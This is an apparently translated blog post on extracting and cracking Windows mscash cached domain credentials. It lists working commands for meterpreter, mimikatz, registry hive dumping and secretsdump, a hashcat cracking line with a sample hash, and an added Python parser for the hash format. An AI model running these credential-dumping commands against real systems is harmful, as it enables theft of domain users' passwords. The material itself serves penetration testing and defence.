Alternative ways to collect cached credentials

Mscash is a Microsoft hashing algorithm used to store cached domain credentials locally on a system after a successful logon.
It's worth noting that cached credentials do not expire.
Domain credentials are cached on the local system so that domain members can still log on to the machine even when the DC is down.
Note also that the mscash hash is not passable, i.e. PtH attacks will not work with it.

Where the cache is actually stored: HKEY_LOCAL_MACHINE\SECURITY\Cache

Ways to obtain the cached credentials

The meterpreter post/windows/gather/cachedump module

The data dumped by meterpreter still needs to be filtered:
echo ; cat hashes.txt ; echo ; cut -d ":" -f 2 hashes.txt

lsadump::cache in mimikatz

Notice that the two methods above only retrieve the users' credentials, whereas parsing the registry by other means can also yield password information for third-party services. In one environment I once parsed out the MSSQL password in cleartext!

reg save HKLM\SYSTEM system & reg save HKLM\security security
lsadump::secrets /system:c:\programdata\system /security:c:\programdata\security

Or:

reg save HKLM\SYSTEM sys.hiv
reg save HKLM\SAM sam.hiv
reg save hklm\security security.hiv
python secretsdump.py -sam sam.hiv -security security.hiv -system sys.hiv LOCAL

Cracking the hash

Data format: $DCC2$10240#username#hash

This data is not plaintext, so it still has to be cracked to recover the password.

hashcat -m2100 '$DCC2$10240#spot#3407de6ff2f044ab21711a394d85f3b8' /usr/share/wordlists/rockyou.txt --force --potfile-disable
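The following is an added example, not code from the original post: a small Python parser for the $DCC2$ format above and a converter from the user:hash lines that the cut pipeline operates on, assuming the username is field 1 and the hex digest field 2. It validates the 32-hex-character digest and the iteration count, and its triage() helper gives a responder the list of accounts whose credentials were cached on the host (and therefore need a reset after a compromise); sample lines other than the page's own spot hash are constructed.

```python
import re
from dataclasses import dataclass

# Hashcat mode 2100 input line: $DCC2$<iterations>#<username>#<32 hex chars>
DCC2_RE = re.compile(r"^\$DCC2\$(\d+)#([^#]+)#([0-9a-fA-F]{32})$")


@dataclass(frozen=True)
class Dcc2Entry:
    iterations: int
    username: str
    digest: bytes  # the 16-byte MS-Cache v2 digest as raw bytes


def parse_dcc2(line: str) -> Dcc2Entry:
    """Parse one $DCC2$ line; raise ValueError if it is not well formed."""
    m = DCC2_RE.match(line.strip())
    if not m:
        raise ValueError(f"not a $DCC2$ line: {line!r}")
    return Dcc2Entry(int(m.group(1)), m.group(2), bytes.fromhex(m.group(3)))


def from_cachedump(line: str, iterations: int = 10240) -> str:
    """Convert a 'user:hash[:more fields]' line (assumed layout, see lead-in)
    into the $DCC2$ form; reject digests that are not 16 bytes of hex and
    usernames that would break the '#'-separated layout."""
    fields = line.strip().split(":")
    if len(fields) < 2:
        raise ValueError(f"expected user:hash, got {line!r}")
    user, digest = fields[0], fields[1].lower()
    if not user or "#" in user:
        raise ValueError(f"unusable username: {user!r}")
    if not re.fullmatch(r"[0-9a-f]{32}", digest):
        raise ValueError(f"digest is not 16 bytes of hex: {digest!r}")
    return f"$DCC2${iterations}#{user}#{digest}"


def triage(dump_lines):
    """Split a dump into (well-formed $DCC2$ lines, rejected raw lines)."""
    good, bad = [], []
    for raw in dump_lines:
        try:
            good.append(from_cachedump(raw))
        except ValueError:
            bad.append(raw)
    return good, bad


# Constructed sample: 'spot' is the hash shown on this page, the rest are made up.
SAMPLE_DUMP = [
    "spot:3407de6ff2f044ab21711a394d85f3b8:CORP",
    "alice:00112233445566778899AABBCCDDEEFF:CORP",
    "bob:not-a-hash:CORP",
    "",
]
```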

Reference article: https://www.ired.team/offensive-security/credential-access-and-credential-dumping/dumping-and-cracking-mscash-cached-domain-credentials

posted @ 2020-12-11 02:02 zpchcbd